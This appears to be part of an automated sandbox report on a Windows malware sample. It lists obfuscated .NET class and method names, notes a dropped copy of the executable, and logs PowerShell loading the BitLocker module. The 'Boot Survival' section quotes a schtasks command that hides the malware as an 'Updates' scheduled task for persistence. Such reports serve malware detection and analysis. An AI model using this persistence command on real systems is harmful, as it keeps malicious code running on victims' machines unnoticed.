                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, k5AhtwGn8mQJvWh94Cv.csHigh entropy of concatenated method names: 'Dos2t87jMF', 'xwd2zT0QdN', 'sFVlBOiT1A', 'yK6BFvPZCDJ2ArHWOBJ', 'VeYShXPFKaW14FR2EVR', 'z4AraCPRdByqxwSp1dF', 'HfDkNjP5Gc09mvEfNUV'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, w8K33CGGhnmZMn6ODNQ.csHigh entropy of concatenated method names: 'XNcJtV7oXK', 'BVWJz3crjH', 'lyU2B5ow1m', 'Jcw2G29OSg', 'hyS2SkKnNH', 'JP72nCKJTJ', 'Q4g2oHOhN9', 'bU52f7HTvS', 'YVf2WshfwQ', 'xyf2DlRv1t'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, H3r56utoOsfimPxpGK.csHigh entropy of concatenated method names: 'YJjJCTofb9', 'Td7JLAmWDL', 'B4GJUSMwiv', 'owCJwDaYhu', 'kspJbZlfYo', 'UYPJPIu4Dl', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, OhMjImvU5OtkHhWlnT.csHigh entropy of concatenated method names: 'rEkbxLUNPD', 'qVobqUAqvB', 'EWfb1Qn2DU', 'Te8b8Ngepx', 'VwobuMNvGZ', 'mTKbd8Fwr8', 'RPZbRcFSLr', 'CeLbjRDGIA', 'ebtbXhvKCX', 'cDsbMP4BbE'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, hNJkaAD7i6mbUvTth2.csHigh entropy of concatenated method names: 'Dispose', 'P92GvcL8sk', 'aRySqm1ooU', 'bAHoGxs60r', 'bGTGt1Y8oA', 'vNdGzhZt3W', 'ProcessDialogKey', 'MbeSBhMjIm', 'i5OSGtkHhW', 'unTSS13r56'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, nE18TyFNSpZFYFqNG7.csHigh entropy of concatenated method names: 'hdQDYw9yqA', 'j3iDNT5xSB', 'xUADkhOIuF', 'A01Dmi5JBK', 'spQDaD19E9', 'DrYDhNl6BJ', 'iNqDOY3gnm', 'kOiD0UUApC', 'qJ0DvQc1uV', 'cKbDt1w7wK'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, maKQ0yStCWeKTLZjv6.csHigh entropy of concatenated method names: 'p2tp4fUVo', 'wgE9n8UXT', 'lTm47QnDZ', 'jeM3xiRvb', 'VFYHRI2NS', 'bmJrlyebn', 'DAHCn2xYwoBHaA4Kcl', 'GSltBA3khZNfY4yATA', 'pDY5ZgPf3', 'bECJJXrYY'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, Kt7WdEYHTK9vudn78X.csHigh entropy of concatenated method names: 'lk9TMRyQY4', 'mk9TZs63Wy', 'YWETYwwMLI', 'VFnTNyZ3GX', 'NwPTqxogur', 'V3LT1sDshW', 'WRlT8EB9ng', 'F3MTuHFXiI', 'S4LTdEYSNO', 'w1lTRHGOGc'
                    Source: 0.2.g44YQtTyjN.exe.3febd28.4.raw.unpack, S4ZPw5HLP8SKw4yP9A.csHigh entropy of concatenated method names: 'WgfC9UTLnA', 'vcSC4vMVfC', 'Xq1CFi4VgI', 'BIgCHaaork', 'OLxCTjcAgD', 'eVtCIFV2vB', 'JeCCKrTe0b', 'z2AC54ftUa', 'nAvCbNPWUh', 'dasCJ4Aj7t'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, of7Q4QO6JZ92cL8skG.csHigh entropy of concatenated method names: 'nnYbTliRqT', 'lOgbKd2JDo', 'Q2xbbKd48y', 'TBHb2ctIcO', 'm9hbskV9KH', 'huBb7kZ4mE', 'Dispose', 'c5H5W7XhAF', 'Eri5Dt6SmM', 'c8o5C0n2b1'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, nZxLbZRMVbxYFIH9ju.csHigh entropy of concatenated method names: 'yTnwWjfFAs', 'RvZwCVDJyI', 'S5hwUDwli7', 'xRmUtoi6ow', 'JejUz4qPx4', 'cPgwBhBeJU', 'tcbwGKCsIx', 'xTZwSH35rd', 'KF3wnhAc5k', 'dARwoA1aZu'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, XQBK8nGo7LpSkIBpXkD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sKGlbXyLMd', 'vedlJUFK7f', 'mc1l27J1Xp', 'iOAllsZoIw', 'Ol3lsi4c7l', 'udBlgHLUDv', 'GeZl7RMNQ1'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, EFYsb3CWYCN3jQC6J2.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'fZ3SvZdpEf', 'jDLSt7sMVk', 'Dr7SzCqAlv', 'EvmnBvOoJC', 'V39nGWyAnl', 'ydunSwLPre', 'fBbnnp2bN2', 'WC95pdQyBtdZxJHEKOQ'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, Aio5xEzmfoII3vyFUn.csHigh entropy of concatenated method names: 'W4jJ4XQVos', 'bwDJFvPRw4', 'RguJHbW6fC', 'nZkJxCnvF0', 'UPsJqsT81C', 'bd8J84Svvk', 'VY3Ju6e4ka', 'pQGJ7Rte4K', 'CTKJivX3ej', 'MMmJEAtQam'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, qpHKcbx1HPcRRb4eZv.csHigh entropy of concatenated method names: 'sx1UfLfXvX', 'rqMUDGwjag', 'nGmULD17El', 'mvUUwmaPKC', 'xJTUPfPMtK', 'iU2LaA2EUS', 'CQkLheodwf', 'Dk9LOL0fX1', 'LEZL0pGkmL', 'ostLvPFOod'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, bc7CIFrDHpVetg05d2.csHigh entropy of concatenated method names: 'WgQLycB8Yf', 'I48L3q2uIG', 'v9RC1ZJ3gt', 'HvgC8u4nVi', 'VrbCuAHgGA', 'cNqCd0BUjw', 'IpjCRtiJPy', 'tSgCjhnwtP', 'eLxCXBl3JN', 'NwkCMki2du'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, c7051ZPN8xVt8hUhsG.csHigh entropy of concatenated method names: 'd6nnfEoys4', 'djgnWGeCET', 'xIpnDT89iG', 'uibnC2beXl', 'b6QnLGiM6A', 'Dv0nUyK2UA', 'fhWnwcvJij', 'P9dnPCbn2m', 'yXinVI3IuU', 'pkVnc3RSPN'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, tpKlUohfpdkCkT7o9Y.csHigh entropy of concatenated method names: 'UkaK0NGsYO', 'QYPKtdsWVF', 'sYX5BktVVB', 'UW75G722Og', 'no5KeDlCEr', 'o7HKZe2G7Y', 'N4aK6YAAi4', 'snmKYAr2AV', 'igXKNLVUgX', 'BZdKkj4BMu'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, NtTVCc6N7Ct9aKDB26.csHigh entropy of concatenated method names: 'zftAFkvMCy', 'CLyAH84gXI', 'ISKAxYvnnC', 'W68AqNPIkb', 'P2WA8dIHWs', 'AOuAuvYf9P', 'YeSARnU2VA', 'osJAj1RMOx', 'H7kAMYgsTa', 'x5MAexcTrd'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, Syve8TXhcAAxKpmLB6.csHigh entropy of concatenated method names: 'qhAwibDHhT', 'zW0wEEHMyX', 'la8wp0Or6u', 'fMnw9FPj9Z', 'cXjwy5BrwZ', 'FVOw4DIUvo', 'Wh4w3TAmhX', 'ISGwFfk9h5', 'FSgwHOTP8d', 'oXOwrJ2Ywx'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, itERePonfX9tNyRiRG.csHigh entropy of concatenated method names: 'EyQGwE18Ty', 'RSpGPZFYFq', 'qLPGc8SKw4', 'BP9GQASc7C', 'w05GTd25pH', 'pcbGI1HPcR', 'ERDkcCZVSjuQJtMWlE', 'Tjy7DqFmT7lSibQ1FV', 'CdrGGrGSGs', 'kMYGnTxRBb'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, CFoKjxka7clapO4nEJ.csHigh entropy of concatenated method names: 'ToString', 'LDQIeoTZ7Q', 'QpUIq71WTY', 'icRI1r0mVR', 'c9sI8D0G7Y', 'c8JIuw4W1T', 'DL6IdIDEnP', 'ECIIRTSB8u', 'IujIjUCnlu', 'bwoIXIq4Se'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, gBm1jOGSdUP4bMbEH8G.csHigh entropy of concatenated method names: 'ToString', 'DWn2F9xoLq', 'jqq2H165PL', 'ec42rAATm8', 'BHu2xfeVY9', 'bBQ2q7pMa9', 'nrI21lEX6X', 'bue28l3Wbh', 'sWDGVxPuBTgFTPG5oSN', 'Awx9rOP2URfcEkHlkpD'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, NUuG2imYy55Q63T4jn.csHigh entropy of concatenated method names: 'EnqKcroLph', 'N5FKQQ7Qqs', 'ToString', 'GhDKWJvTy0', 'BfhKDoBmlJ', 'IesKCrpbOT', 'cO0KLgBaQm', 'JVIKULWx5R', 'U1SKw5P9GR', 'A6RKPgCaOy'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, k5AhtwGn8mQJvWh94Cv.csHigh entropy of concatenated method names: 'Dos2t87jMF', 'xwd2zT0QdN', 'sFVlBOiT1A', 'yK6BFvPZCDJ2ArHWOBJ', 'VeYShXPFKaW14FR2EVR', 'z4AraCPRdByqxwSp1dF', 'HfDkNjP5Gc09mvEfNUV'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, w8K33CGGhnmZMn6ODNQ.csHigh entropy of concatenated method names: 'XNcJtV7oXK', 'BVWJz3crjH', 'lyU2B5ow1m', 'Jcw2G29OSg', 'hyS2SkKnNH', 'JP72nCKJTJ', 'Q4g2oHOhN9', 'bU52f7HTvS', 'YVf2WshfwQ', 'xyf2DlRv1t'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, H3r56utoOsfimPxpGK.csHigh entropy of concatenated method names: 'YJjJCTofb9', 'Td7JLAmWDL', 'B4GJUSMwiv', 'owCJwDaYhu', 'kspJbZlfYo', 'UYPJPIu4Dl', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, OhMjImvU5OtkHhWlnT.csHigh entropy of concatenated method names: 'rEkbxLUNPD', 'qVobqUAqvB', 'EWfb1Qn2DU', 'Te8b8Ngepx', 'VwobuMNvGZ', 'mTKbd8Fwr8', 'RPZbRcFSLr', 'CeLbjRDGIA', 'ebtbXhvKCX', 'cDsbMP4BbE'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, hNJkaAD7i6mbUvTth2.csHigh entropy of concatenated method names: 'Dispose', 'P92GvcL8sk', 'aRySqm1ooU', 'bAHoGxs60r', 'bGTGt1Y8oA', 'vNdGzhZt3W', 'ProcessDialogKey', 'MbeSBhMjIm', 'i5OSGtkHhW', 'unTSS13r56'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, nE18TyFNSpZFYFqNG7.csHigh entropy of concatenated method names: 'hdQDYw9yqA', 'j3iDNT5xSB', 'xUADkhOIuF', 'A01Dmi5JBK', 'spQDaD19E9', 'DrYDhNl6BJ', 'iNqDOY3gnm', 'kOiD0UUApC', 'qJ0DvQc1uV', 'cKbDt1w7wK'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, maKQ0yStCWeKTLZjv6.csHigh entropy of concatenated method names: 'p2tp4fUVo', 'wgE9n8UXT', 'lTm47QnDZ', 'jeM3xiRvb', 'VFYHRI2NS', 'bmJrlyebn', 'DAHCn2xYwoBHaA4Kcl', 'GSltBA3khZNfY4yATA', 'pDY5ZgPf3', 'bECJJXrYY'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, Kt7WdEYHTK9vudn78X.csHigh entropy of concatenated method names: 'lk9TMRyQY4', 'mk9TZs63Wy', 'YWETYwwMLI', 'VFnTNyZ3GX', 'NwPTqxogur', 'V3LT1sDshW', 'WRlT8EB9ng', 'F3MTuHFXiI', 'S4LTdEYSNO', 'w1lTRHGOGc'
                    Source: 13.2.ECmmsbHOaKPh.exe.45fdb08.2.raw.unpack, S4ZPw5HLP8SKw4yP9A.csHigh entropy of concatenated method names: 'WgfC9UTLnA', 'vcSC4vMVfC', 'Xq1CFi4VgI', 'BIgCHaaork', 'OLxCTjcAgD', 'eVtCIFV2vB', 'JeCCKrTe0b', 'z2AC54ftUa', 'nAvCbNPWUh', 'dasCJ4Aj7t'
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeFile created: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
